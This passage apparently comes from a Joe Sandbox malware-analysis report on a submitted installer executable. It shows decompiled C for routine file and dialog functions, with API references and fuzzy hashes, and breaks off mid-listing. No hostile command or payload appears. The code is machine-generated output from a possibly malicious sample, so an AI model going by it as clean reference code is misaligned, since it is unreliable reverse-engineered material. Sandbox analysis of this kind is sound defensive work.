              • Associated: 00000000.00000002.497600698.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.497600698.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.497600698.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.497600698.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.497657116.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_P196hUN2fw.jbxd
              Similarity
              • API ID: File$AttributesCreate
              • String ID:
              • API String ID: 415043291-0
              • Opcode ID: 80243517f436f95d2d00e5b5224d95f101b34955670c918b0becce4e09b30ec3
              • Instruction ID: 6905ba7dec075751c4c8bdaf1e97cd52a4ed4154a0977e2bcfee25d1bc4df630
              • Opcode Fuzzy Hash: 80243517f436f95d2d00e5b5224d95f101b34955670c918b0becce4e09b30ec3
              • Instruction Fuzzy Hash: F5D09E31254201EFEF098F20DE16F2EBBA2EB94B00F11952CB682944E1DA715819AB19
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00405AD9 Relevance: 3.0, APIs: 2, Instructions: 13COMMON
              Download Yara Rule
              C-Code - Quality: 100%
              			E00405AD9(CHAR* _a4) {
				signed char _t3;
				signed char _t7;

				_t3 = GetFileAttributesA(_a4); // executed
				_t7 = _t3;
				if(_t7 != 0xffffffff) {
					SetFileAttributesA(_a4, _t3 & 0x000000fe); // executed
				}
				return _t7;
			}





              0x00405ade
              0x00405ae4
              0x00405ae9
              0x00405af2
              0x00405af2
              0x00405afb

              APIs
              • GetFileAttributesA.KERNELBASE(?,?,004056F1,?,?,00000000,004058D4,?,?,?,?), ref: 00405ADE
              • SetFileAttributesA.KERNELBASE(?,00000000), ref: 00405AF2
              Memory Dump Source
              • Source File: 00000000.00000002.497583123.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000000.00000002.497576067.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.497592829.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.497600698.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.497600698.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.497600698.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.497600698.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.497657116.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_P196hUN2fw.jbxd
              Similarity
              • API ID: AttributesFile
              • String ID:
              • API String ID: 3188754299-0
              • Opcode ID: d21186c4df97c8b90cedd4d9d2ae0fe59d501b3437fd2b8c2b63dc03c6f7d79a
              • Instruction ID: a8f15113e5c9b75401305b8f42f7b900fd80c9315a1f16fe78aaf2180abbdc87
              • Opcode Fuzzy Hash: d21186c4df97c8b90cedd4d9d2ae0fe59d501b3437fd2b8c2b63dc03c6f7d79a
              • Instruction Fuzzy Hash: B8D0C972504122ABC2102728AE0889BBB55DB54271702CB35F9B9A26B1DB304C56AA98
              Uniqueness

              Uniqueness Score: -1.00%

              Function 004036DB Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 11COMMON
              Download Yara Rule
              C-Code - Quality: 100%
              			E004036DB() {
				void* _t1;
				void* _t3;
				signed int _t6;

				_t1 =  *0x40a018; // 0xffffffff
				if(_t1 != 0xffffffff) {
					CloseHandle(_t1);
					 *0x40a018 =  *0x40a018 | 0xffffffff;
					_t6 =  *0x40a018;
				}
				E00403720();
				_t3 = E0040572D(_t6, "C:\\Users\\alfons\\AppData\\Local\\Temp\\nst356E.tmp\\", 7); // executed
				return _t3;
			}






              0x004036db
              0x004036e3
              0x004036e6
              0x004036ec
              0x004036ec
              0x004036ec
              0x004036f3
              0x004036ff
              0x00403704

              APIs
              • CloseHandle.KERNEL32(FFFFFFFF,00403512,?,?,00000006,00000008,0000000A), ref: 004036E6
              Strings
              • C:\Users\user\AppData\Local\Temp\nst356E.tmp\, xrefs: 004036FA
              Memory Dump Source
              • Source File: 00000000.00000002.497583123.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000000.00000002.497576067.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.497592829.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.497600698.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.497600698.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.497600698.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.497600698.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.497657116.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_P196hUN2fw.jbxd
              Similarity
              • API ID: CloseHandle
              • String ID: C:\Users\user\AppData\Local\Temp\nst356E.tmp\
              • API String ID: 2962429428-1068058775
              • Opcode ID: 7bb9d04c8b35ddb385cf310f384fb45be282d55caa20868854ffc01acd183563
              • Instruction ID: a1bde45f6d244ba91e802d61d3971a42b11b03c2813ac8242e2f7427b9539a77
              • Opcode Fuzzy Hash: 7bb9d04c8b35ddb385cf310f384fb45be282d55caa20868854ffc01acd183563
              • Instruction Fuzzy Hash: 5DC01270504701A6C5346F74AE4F6093A14AB44735F604725B0B5F21F1CB7C565A556E
              Uniqueness

              Uniqueness Score: -1.00%

              Function 004055CF Relevance: 3.0, APIs: 2, Instructions: 9COMMON
              Download Yara Rule
              C-Code - Quality: 100%
              			E004055CF(CHAR* _a4) {
				int _t2;

				_t2 = CreateDirectoryA(_a4, 0); // executed
				if(_t2 == 0) {
					return GetLastError();
				}
				return 0;
			}




              0x004055d5
              0x004055dd
              0x00000000
              0x004055e3
              0x00000000

              APIs
              • CreateDirectoryA.KERNELBASE(?,00000000,004031E4,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403405,?,00000006,00000008,0000000A), ref: 004055D5
              • GetLastError.KERNEL32(?,00000006,00000008,0000000A), ref: 004055E3
              Memory Dump Source
              • Source File: 00000000.00000002.497583123.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000000.00000002.497576067.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.497592829.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.497600698.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.497600698.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.497600698.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.497600698.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.497657116.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_P196hUN2fw.jbxd
              Similarity
              • API ID: CreateDirectoryErrorLast
              • String ID:
              • API String ID: 1375471231-0
              • Opcode ID: f012ed4f2e447eb03a7c1a9074efbf4aa4d4dcf66ab1e3e2b7403bfb804529af
              • Instruction ID: ff59ce228810ab0b399ea54ffc24e93d20618ce1ebfa51e1db99450e15aaec59
              • Opcode Fuzzy Hash: f012ed4f2e447eb03a7c1a9074efbf4aa4d4dcf66ab1e3e2b7403bfb804529af
              • Instruction Fuzzy Hash: FAC08C30200101ABDB010B318F08B073A62AB80380F0288396042E00B4CA308004C92E
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00405B76 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
              Download Yara Rule
              C-Code - Quality: 100%
              			E00405B76(void* _a4, void* _a8, long _a12) {
				int _t7;
				long _t11;

				_t11 = _a12;
				_t7 = ReadFile(_a4, _a8, _t11,  &_a12, 0); // executed
				if(_t7 == 0 || _t11 != _a12) {
					return 0;
				} else {
					return 1;
				}
			}





              0x00405b7a
              0x00405b8a
              0x00405b92
              0x00000000
              0x00405b99
              0x00000000
              0x00405b9b

              APIs
              • ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,004031A6,00000000,00000000,00402FD0,000000FF,00000004,00000000,00000000,00000000), ref: 00405B8A
              Memory Dump Source
              • Source File: 00000000.00000002.497583123.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000000.00000002.497576067.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.497592829.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.497600698.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.497600698.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.497600698.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.497600698.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.497657116.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_P196hUN2fw.jbxd
              Similarity
              • API ID: FileRead
              • String ID:
              • API String ID: 2738559852-0
              • Opcode ID: c828ac78080eafadef002e80ceae40fa9d69551b6ff84e56452d6cc727993955
              • Instruction ID: d6e1a33fd195441beba49eedd959afadaf6b56434895abd4101947bffd5346ea
              • Opcode Fuzzy Hash: c828ac78080eafadef002e80ceae40fa9d69551b6ff84e56452d6cc727993955
              • Instruction Fuzzy Hash: 21E0EC3221065EABDF10AE559C04AEB7B6CEB05360F004437F915E3150D635F9219BA8
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00405BA5 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
              Download Yara Rule
              C-Code - Quality: 100%
              			E00405BA5(void* _a4, void* _a8, long _a12) {
				int _t7;
				long _t11;

				_t11 = _a12;
				_t7 = WriteFile(_a4, _a8, _t11,  &_a12, 0); // executed
				if(_t7 == 0 || _t11 != _a12) {
					return 0;
				} else {
					return 1;
				}
			}





              0x00405ba9
              0x00405bb9
              0x00405bc1
              0x00000000
              0x00405bc8
              0x00000000
              0x00405bca

              APIs
              • WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,0040315C,00000000,00415428,000000FF,00415428,000000FF,000000FF,00000004,00000000), ref: 00405BB9
              Memory Dump Source
              • Source File: 00000000.00000002.497583123.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000000.00000002.497576067.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.497592829.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.497600698.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.497600698.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.497600698.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.497600698.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.497657116.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_P196hUN2fw.jbxd
              Similarity
              • API ID: FileWrite
              • String ID:
              • API String ID: 3934441357-0
              • Opcode ID: d47d29d2c4ad98e9097244963089aa7711ad8f9da7a01510603535aa68a2578c
              • Instruction ID: 823d1a00ca840d25d454e1cdeec80758da7ba5e35e2b738bcb0e321267d0793f
              • Opcode Fuzzy Hash: d47d29d2c4ad98e9097244963089aa7711ad8f9da7a01510603535aa68a2578c
              • Instruction Fuzzy Hash: DEE0EC3222075EAFDF50AE559C00AEB7B7CEB05760F004437F925E2190E631F9219BAC
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00405D44 Relevance: 1.5, APIs: 1, Instructions: 13COMMON
              Download Yara Rule
              C-Code - Quality: 68%
              			E00405D44(void* __ecx, CHAR* _a4, CHAR* _a8) {
				int _t5;
				void* _t6;

				_t6 = __ecx;
				_t5 = MoveFileExA(_a4, _a8, 5); // executed
				if(_t5 == 0) {
					_push(_a8);
					_push(_a4);
					_t5 = E00405BD4(_t6);
				}
				 *0x42f4b0 =  *0x42f4b0 + 1;
				return _t5;
			}





              0x00405d44
              0x00405d4e
              0x00405d56
              0x00405d58
              0x00405d5c
              0x00405d60
              0x00405d66
              0x00405d67
              0x00405d6d

              APIs
              • MoveFileExA.KERNEL32 ref: 00405D4E
                • Part of subcall function 00405BD4: CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,00000000,00405D65,?,?), ref: 00405C05
                • Part of subcall function 00405BD4: GetShortPathNameA.KERNEL32 ref: 00405C0E
                • Part of subcall function 00405BD4: GetShortPathNameA.KERNEL32 ref: 00405C2B
                • Part of subcall function 00405BD4: wsprintfA.USER32 ref: 00405C49
                • Part of subcall function 00405BD4: GetFileSize.KERNEL32(00000000,00000000,0042CA00,C0000000,00000004,0042CA00,?,?,?,?,?), ref: 00405C84
                • Part of subcall function 00405BD4: GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405C93
                • Part of subcall function 00405BD4: lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405CCB
                • Part of subcall function 00405BD4: SetFilePointer.KERNEL32(0040A3B8,00000000,00000000,00000000,00000000,0042C200,00000000,-0000000A,0040A3B8,00000000,[Rename],00000000,00000000,00000000), ref: 00405D21
                • Part of subcall function 00405BD4: GlobalFree.KERNEL32 ref: 00405D32
              Memory Dump Source
              • Source File: 00000000.00000002.497583123.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000000.00000002.497576067.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.497592829.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.497600698.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.497600698.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.497600698.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.497600698.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.497657116.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_P196hUN2fw.jbxd
              Similarity
              • API ID: File$GlobalNamePathShort$AllocCloseFreeHandleMovePointerSizelstrcpywsprintf
              • String ID:
              • API String ID: 299535525-0
              • Opcode ID: 357cd734fd2ea1d3f4f601ad3e31a1be9675888ca9e718e542911529a83bbe62
              • Instruction ID: 8264f8fe3c9c578956083b3625533de480bc17291d9062dfb527519968c09de9
              • Opcode Fuzzy Hash: 357cd734fd2ea1d3f4f601ad3e31a1be9675888ca9e718e542911529a83bbe62
              • Instruction Fuzzy Hash: CAD0A932108300BEDB122B20EC08A1BBBB1FF9031AF21C83EF184600B0EB329021DF09
              Uniqueness

              Uniqueness Score: -1.00%

              Function 004031A9 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
              Download Yara Rule
              C-Code - Quality: 100%
              			E004031A9(long _a4) {
				long _t2;

				_t2 = SetFilePointer( *0x40a018, _a4, 0, 0); // executed
				return _t2;
			}




              0x004031b7
              0x004031bd

              APIs
              • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402F0F,?), ref: 004031B7
              Memory Dump Source
              • Source File: 00000000.00000002.497583123.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000000.00000002.497576067.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.497592829.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.497600698.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.497600698.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.497600698.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.497600698.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.497657116.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_P196hUN2fw.jbxd
              Similarity
              • API ID: FilePointer
              • String ID:
              • API String ID: 973152223-0
              • Opcode ID: 9851be0de28bb9513f6e500a0df6ea838ed72b99fd7baa621d8f85bec57c8f40
              • Instruction ID: 1f5c7ae16c2334422adcad36111bde95194575cbdac9b1f52e29a9f6e91cc98e
              • Opcode Fuzzy Hash: 9851be0de28bb9513f6e500a0df6ea838ed72b99fd7baa621d8f85bec57c8f40
              • Instruction Fuzzy Hash: 34B01271240300BFDA214F00DF09F057B21ABA0700F10C034B388380F086711035EB0D
              Uniqueness

              Uniqueness Score: -1.00%

              Non-executed Functions

              Function 00404A09 Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 481windowmemoryCOMMONCrypto
              Download Yara Rule
              C-Code - Quality: 96%
              			E00404A09(struct HWND__* _a4, int _a8, signed int _a12, int _a16) {
				struct HWND__* _v8;
				struct HWND__* _v12;
				signed int _v16;
				signed int _v20;
				intOrPtr _v24;
				signed char* _v28;
				long _v32;
				signed int _v40;
				int _v44;
				signed int* _v56;
				signed char* _v60;
				signed int _v64;
				long _v68;
				void* _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				void* _v84;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t192;
				intOrPtr _t195;
				intOrPtr _t197;
				long _t201;
				signed int _t205;
				signed int _t216;
				void* _t219;
				void* _t220;
				int _t226;
				signed int _t231;
				signed int _t232;
				signed int _t233;
				signed int _t239;
				signed int _t241;
				signed char _t242;
				signed char _t248;
				void* _t252;
				void* _t254;
				signed char* _t270;
				signed char _t271;
				long _t276;
				int _t282;
				signed int _t283;
				long _t284;
				signed int _t287;
				signed int _t294;
				signed char* _t302;
				struct HWND__* _t306;
				int _t307;
				signed int* _t308;
				int _t309;
				long _t310;
				signed int _t311;
				void* _t313;
				long _t314;
				int _t315;
				signed int _t316;
				void* _t318;

				_t306 = _a4;
				_v12 = GetDlgItem(_t306, 0x3f9);
				_v8 = GetDlgItem(_t306, 0x408);
				_t318 = SendMessageA;
				_v20 =  *0x42f448;
				_t282 = 0;
				_v24 =  *0x42f414 + 0x94;
				if(_a8 != 0x110) {
					L23:
					if(_a8 != 0x405) {
						_t285 = _a16;
					} else {
						_a12 = _t282;
						_t285 = 1;
						_a8 = 0x40f;
						_a16 = 1;
					}
					if(_a8 == 0x4e || _a8 == 0x413) {
						_v16 = _t285;
						if(_a8 == 0x413 ||  *((intOrPtr*)(_t285 + 4)) == 0x408) {
							if(( *0x42f41d & 0x00000002) != 0) {
								L41:
								if(_v16 != _t282) {
									_t231 = _v16;
									if( *((intOrPtr*)(_t231 + 8)) == 0xfffffe6e) {
										SendMessageA(_v8, 0x419, _t282,  *(_t231 + 0x5c));
									}
									_t232 = _v16;
									if( *((intOrPtr*)(_t232 + 8)) == 0xfffffe6a) {
										_t285 = _v20;
										_t233 =  *(_t232 + 0x5c);
										if( *((intOrPtr*)(_t232 + 0xc)) != 2) {
											 *(_t233 * 0x418 + _t285 + 8) =  *(_t233 * 0x418 + _t285 + 8) & 0xffffffdf;
										} else {
											 *(_t233 * 0x418 + _t285 + 8) =  *(_t233 * 0x418 + _t285 + 8) | 0x00000020;
										}
									}
								}
								goto L48;
							}
							if(_a8 == 0x413) {
								L33:
								_t285 = 0 | _a8 != 0x00000413;
								_t239 = E00404957(_v8, _a8 != 0x413);
								_t311 = _t239;
								if(_t311 >= _t282) {
									_t88 = _v20 + 8; // 0x8
									_t285 = _t239 * 0x418 + _t88;
									_t241 =  *_t285;
									if((_t241 & 0x00000010) == 0) {
										if((_t241 & 0x00000040) == 0) {
											_t242 = _t241 ^ 0x00000001;
										} else {
											_t248 = _t241 ^ 0x00000080;
											if(_t248 >= 0) {
												_t242 = _t248 & 0x000000fe;
											} else {
												_t242 = _t248 | 0x00000001;
											}
										}
										 *_t285 = _t242;
										E0040117D(_t311);
										_a12 = _t311 + 1;
										_a16 =  !( *0x42f41c) >> 0x00000008 & 0x00000001;
										_a8 = 0x40f;
									}
								}
								goto L41;
							}
							_t285 = _a16;
							if( *((intOrPtr*)(_a16 + 8)) != 0xfffffffe) {
								goto L41;
							}
							goto L33;
						} else {
							goto L48;
						}
					} else {
						L48:
						if(_a8 != 0x111) {
							L56:
							if(_a8 == 0x200) {
								SendMessageA(_v8, 0x200, _t282, _t282);
							}
							if(_a8 == 0x40b) {
								_t219 =  *0x42a854;
								if(_t219 != _t282) {
									ImageList_Destroy(_t219);
								}
								_t220 =  *0x42a868;
								if(_t220 != _t282) {
									GlobalFree(_t220);
								}
								 *0x42a854 = _t282;
								 *0x42a868 = _t282;
								 *0x42f480 = _t282;
							}
							if(_a8 != 0x40f) {
								L88:
								if(_a8 == 0x420 && ( *0x42f41d & 0x00000001) != 0) {
									_t307 = (0 | _a16 == 0x00000020) << 3;
									ShowWindow(_v8, _t307);
									ShowWindow(GetDlgItem(_a4, 0x3fe), _t307);
								}
								goto L91;
							} else {
								E004011EF(_t285, _t282, _t282);
								_t192 = _a12;
								if(_t192 != _t282) {
									if(_t192 != 0xffffffff) {
										_t192 = _t192 - 1;
									}
									_push(_t192);
									_push(8);
									E004049D7();
								}
								if(_a16 == _t282) {
									L75:
									E004011EF(_t285, _t282, _t282);
									_v32 =  *0x42a868;
									_t195 =  *0x42f448;
									_v60 = 0xf030;
									_v20 = _t282;
									if( *0x42f44c <= _t282) {
										L86:
										InvalidateRect(_v8, _t282, 1);
										_t197 =  *0x42ebdc; // 0x4cc0ca
										if( *((intOrPtr*)(_t197 + 0x10)) != _t282) {
											E00404912(0x3ff, 0xfffffffb, E0040492A(5));
										}
										goto L88;
									}
									_t308 = _t195 + 8;
									do {
										_t201 =  *((intOrPtr*)(_v32 + _v20 * 4));
										if(_t201 != _t282) {
											_t287 =  *_t308;
											_v68 = _t201;
											_v72 = 8;
											if((_t287 & 0x00000001) != 0) {
												_v72 = 9;
												_v56 =  &(_t308[4]);
												_t308[0] = _t308[0] & 0x000000fe;
											}
											if((_t287 & 0x00000040) == 0) {
												_t205 = (_t287 & 0x00000001) + 1;
												if((_t287 & 0x00000010) != 0) {
													_t205 = _t205 + 3;
												}
											} else {
												_t205 = 3;
											}
											_v64 = (_t205 << 0x0000000b | _t287 & 0x00000008) + (_t205 << 0x0000000b | _t287 & 0x00000008) | _t287 & 0x00000020;
											SendMessageA(_v8, 0x1102, (_t287 >> 0x00000005 & 0x00000001) + 1, _v68);
											SendMessageA(_v8, 0x110d, _t282,  &_v72);
										}
										_v20 = _v20 + 1;
										_t308 =  &(_t308[0x106]);
									} while (_v20 <  *0x42f44c);
									goto L86;
								} else {
									_t309 = E004012E2( *0x42a868);
									E00401299(_t309);
									_t216 = 0;
									_t285 = 0;
									if(_t309 <= _t282) {
										L74:
										SendMessageA(_v12, 0x14e, _t285, _t282);
										_a16 = _t309;
										_a8 = 0x420;
										goto L75;
									} else {
										goto L71;
									}
									do {
										L71:
										if( *((intOrPtr*)(_v24 + _t216 * 4)) != _t282) {
											_t285 = _t285 + 1;
										}
										_t216 = _t216 + 1;
									} while (_t216 < _t309);
									goto L74;
								}
							}
						}
						if(_a12 != 0x3f9 || _a12 >> 0x10 != 1) {
							goto L91;
						} else {
							_t226 = SendMessageA(_v12, 0x147, _t282, _t282);
							if(_t226 == 0xffffffff) {
								goto L91;
							}
							_t310 = SendMessageA(_v12, 0x150, _t226, _t282);
							if(_t310 == 0xffffffff ||  *((intOrPtr*)(_v24 + _t310 * 4)) == _t282) {
								_t310 = 0x20;
							}
							E00401299(_t310);
							SendMessageA(_a4, 0x420, _t282, _t310);
							_a12 = _a12 | 0xffffffff;
							_a16 = _t282;
							_a8 = 0x40f;
							goto L56;
						}
					}
				} else {
					_v32 = 0;
					_v16 = 2;
					 *0x42f480 = _t306;
					 *0x42a868 = GlobalAlloc(0x40,  *0x42f44c << 2);
					_t252 = LoadBitmapA( *0x42f400, 0x6e);
					 *0x42a85c =  *0x42a85c | 0xffffffff;
					_t313 = _t252;
					 *0x42a864 = SetWindowLongA(_v8, 0xfffffffc, E00405000);
					_t254 = ImageList_Create(0x10, 0x10, 0x21, 6, 0);
					 *0x42a854 = _t254;
					ImageList_AddMasked(_t254, _t313, 0xff00ff);
					SendMessageA(_v8, 0x1109, 2,  *0x42a854);
					if(SendMessageA(_v8, 0x111c, 0, 0) < 0x10) {
						SendMessageA(_v8, 0x111b, 0x10, 0);
					}
					DeleteObject(_t313);
					_t314 = 0;
					do {
						_t260 =  *((intOrPtr*)(_v24 + _t314 * 4));
						if( *((intOrPtr*)(_v24 + _t314 * 4)) != _t282) {
							if(_t314 != 0x20) {
								_v16 = _t282;
							}
							SendMessageA(_v12, 0x151, SendMessageA(_v12, 0x143, _t282, E00405F87(_t282, _t314, _t318, _t282, _t260)), _t314);
						}
						_t314 = _t314 + 1;
					} while (_t314 < 0x21);
					_t315 = _a16;
					_t283 = _v16;
					_push( *((intOrPtr*)(_t315 + 0x30 + _t283 * 4)));
					_push(0x15);
					E00404026(_a4);
					_push( *((intOrPtr*)(_t315 + 0x34 + _t283 * 4)));
					_push(0x16);
					E00404026(_a4);
					_t316 = 0;
					_t284 = 0;
					if( *0x42f44c <= 0) {
						L19:
						SetWindowLongA(_v8, 0xfffffff0, GetWindowLongA(_v8, 0xfffffff0) & 0x000000fb);
						goto L20;
					} else {
						_t302 = _v20 + 8;
						_v28 = _t302;
						do {
							_t270 =  &(_t302[0x10]);
							if( *_t270 != 0) {
								_v60 = _t270;
								_t271 =  *_t302;
								_t294 = 0x20;
								_v84 = _t284;
								_v80 = 0xffff0002;
								_v76 = 0xd;
								_v64 = _t294;
								_v40 = _t316;
								_v68 = _t271 & _t294;
								if((_t271 & 0x00000002) == 0) {
									if((_t271 & 0x00000004) == 0) {
										 *( *0x42a868 + _t316 * 4) = SendMessageA(_v8, 0x1100, 0,  &_v84);
									} else {
										_t284 = SendMessageA(_v8, 0x110a, 3, _t284);
									}
								} else {
									_v76 = 0x4d;
									_v44 = 1;
									_t276 = SendMessageA(_v8, 0x1100, 0,  &_v84);
									_v32 = 1;
									 *( *0x42a868 + _t316 * 4) = _t276;
									_t284 =  *( *0x42a868 + _t316 * 4);
								}
							}
							_t316 = _t316 + 1;
							_t302 =  &(_v28[0x418]);
							_v28 = _t302;
						} while (_t316 <  *0x42f44c);
						if(_v32 != 0) {
							L20:
							if(_v16 != 0) {
								E0040405B(_v8);
								_t282 = 0;
								goto L23;
							} else {
								ShowWindow(_v12, 5);
								E0040405B(_v12);
								L91:
								return E0040408D(_a8, _a12, _a16);
							}
						}
						goto L19;
					}
				}
			}





























































              0x00404a18
              0x00404a29
              0x00404a2e
              0x00404a36
              0x00404a3c
              0x00404a44
              0x00404a52
              0x00404a55
              0x00404c75
              0x00404c7c
              0x00404c90
              0x00404c7e
              0x00404c80
              0x00404c83
              0x00404c84
              0x00404c8b
              0x00404c8b
              0x00404c9c
              0x00404caa
              0x00404cad
              0x00404cc3
              0x00404d38
              0x00404d3b
              0x00404d3d
              0x00404d47
              0x00404d55
              0x00404d55
              0x00404d57
              0x00404d61
              0x00404d67
              0x00404d6a
              0x00404d6d
              0x00404d88
              0x00404d6f
              0x00404d79
              0x00404d79
              0x00404d6d
              0x00404d61
              0x00000000
              0x00404d3b
              0x00404cc8
              0x00404cd3
              0x00404cd8
              0x00404cdf
              0x00404ce4
              0x00404ce8
              0x00404cf3
              0x00404cf3
              0x00404cf7
              0x00404cfb
              0x00404cff
              0x00404d12
              0x00404d01
              0x00404d01
              0x00404d08
              0x00404d0e
              0x00404d0a
              0x00404d0a
              0x00404d0a
              0x00404d08
              0x00404d16
              0x00404d18
              0x00404d2b
              0x00404d2e
              0x00404d31
              0x00404d31
              0x00404cfb
              0x00000000
              0x00404ce8
              0x00404cca
              0x00404cd1
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x00404d8b
              0x00404d8b
              0x00404d92
              0x00404e03
              0x00404e0b
              0x00404e13
              0x00404e13
              0x00404e1c
              0x00404e1e
              0x00404e25
              0x00404e28
              0x00404e28
              0x00404e2e
              0x00404e35
              0x00404e38
              0x00404e38
              0x00404e3e
              0x00404e44
              0x00404e4a
              0x00404e4a
              0x00404e57
              0x00404fad
              0x00404fb4
              0x00404fd1
              0x00404fd7
